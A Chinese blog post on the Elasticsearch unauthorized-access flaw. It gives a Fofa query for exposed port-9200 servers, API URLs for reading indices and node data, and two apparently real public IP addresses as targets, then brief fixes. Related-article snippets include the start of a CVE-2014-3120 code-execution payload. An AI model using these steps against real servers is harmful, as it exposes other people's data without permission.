Elasticsearch未授权访问漏洞

已于 2024-08-05 09:57:39 修改
阅读量273 收藏 3
点赞数 7
文章标签: elasticsearch 安全
于 2024-08-05 09:49:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71053667/article/details/140918755
版权

ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费,所以免费开源的Elasticsearch可能存在未授权访问漏洞。该漏洞导致,攻击者可以拥有Elasticsearch的所有权限。可以对数据进行任意操作。业务系统将面临敏感数据泄露、数据丢失、数据遭到破坏甚至遭到攻击者的勒索。

》》》漏洞信息《《《

Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。

步骤一:使用以下Fofa语法进行Elasticsearch产品搜索

"Elasticsearch" && port="9200"

步骤二:存在未授权访问则直接进入到信息页面....不需要输入用户密码登陆...

#目标地址
http://121.37.170.50:9200/
#访问测试
http://localhost:9200/_plugin/head/ web管理界面
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search 查看数据库敏感信息
http://localhost:9200/_nodes 查看节点数据

步骤三:可按照上面查看节点信息等.

http://47.93.99.255:9200/_nodes

 

》》》漏洞修复《《《

  1. 访问控制策略,限制IP访问,绑定固定IP。
  2. config/elasticsearch.yml中为9200端口设置认证等

发生什么事了318
关注
web渗透测试漏洞复现:Elasticsearch授权漏洞复现
HACKONE的博客
03-18 2900
Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能存在授权访问漏洞。这意味着攻击者可能获得 Elasticsearch 的所有权限,从而能够对数据进行任意操作。这可能导致业务系统中的敏感数据泄露、数据丢失、数据损坏。
ElasticSearch 命令执行漏洞(CVE-2014-3120)
weixin_59086772的博客
01-04 1998
0x00前言 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 0x01漏洞原理 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 0x02影响版本 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 0x03环境搭建 do
Elasticsearch 授权访问漏洞总结
qq_45746681的博客
10-05 2760
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、ElasticSearch授权访问是什么?二、复现1.搭建环境2.复现 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、ElasticSearch授权访问是什么? ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多
授权访问漏洞系列详解
最新发布
Jz031212的博客
08-05 1541
而我们这章的主题Kibana担任视图层角色,拥有各种维度的查询和分析并使用图形化的界面展示存放在Elasticsearch中的数据。2.使用TLS认证修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档,说的是配置好TLS后,Docker CLl在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。
ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试
ADummy的博客
02-24 363
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 MVEL执行命令的代码如下: import java.io.*; new java.util.Scanner(Runtime.g
elasticsearch授权访问 漏洞修复
05-09
本文将详细讲解如何修复 Elasticsearch授权访问漏洞,并设置账号密码。 首先,对于单节点的 Elasticsearch 部署,我们需要编辑配置文件 `/etc/elasticsearch/elasticsearch.yml`。在该文件中添加以下内容: 1...
Elasticsearch 授权访问漏洞
龙卷风摧毁停车场
03-08 5889
ElasticSearch 是一款 Java 编写的企业级搜索服务,启动此服务默认开放 HTTP-9200 端口,可被非法操作数据。
ElasticSearch单机或集群授权访问漏洞
爱辉弟的博客
12-18 3764
ElasticSearch授权访问漏洞,使用系统防火墙来做限制只允许ES集群和Server节点的IP来访问漏洞节点的9200端口,其他的全部拒绝。并在ES节点上设置用户密码
Elasticsearch 授权访问
梦里明明有六趣,觉后空空无大千
05-26 796
将过去和羁绊全部丢弃,不要吝惜那为了梦想流下的泪水。
Elasticsearch授权访问漏洞(Es授权访问)
热门推荐
m0_67402564的博客
04-18 1万+
Elasticsearch是一个开源的高扩展的分布式全文检索引擎,它可以近乎实时的存储、检索数据;本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据。Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。 当ElasticSearch的节点启动后,它会利用多播(multicast)(或者单播,如果用户更改了配置)寻找集群中的其它节点,并与之建立连接。这个过程
授权访问Elasticsearch 授权访问漏洞
qq_68163788的博客
05-19 2832
ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费,所以免费开源的Elasticsearch可能存在授权访问漏洞
Elasticsearch写入webshell漏洞(WooYun-2015-110216)
weixin_45366453的博客
07-02 406
Elasticsearch写入webshell漏洞(WooYun-2015-110216)
elasticsearch授权访问漏洞
06-28
elasticsearch授权访问漏洞是指在elasticsearch服务器上,由于正确配置访问控制,导致攻击者可以通过简单的HTTP请求获取敏感数据或者进行恶意操作的漏洞。这种漏洞可能会导致数据泄露、篡改、删除等安全问题,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值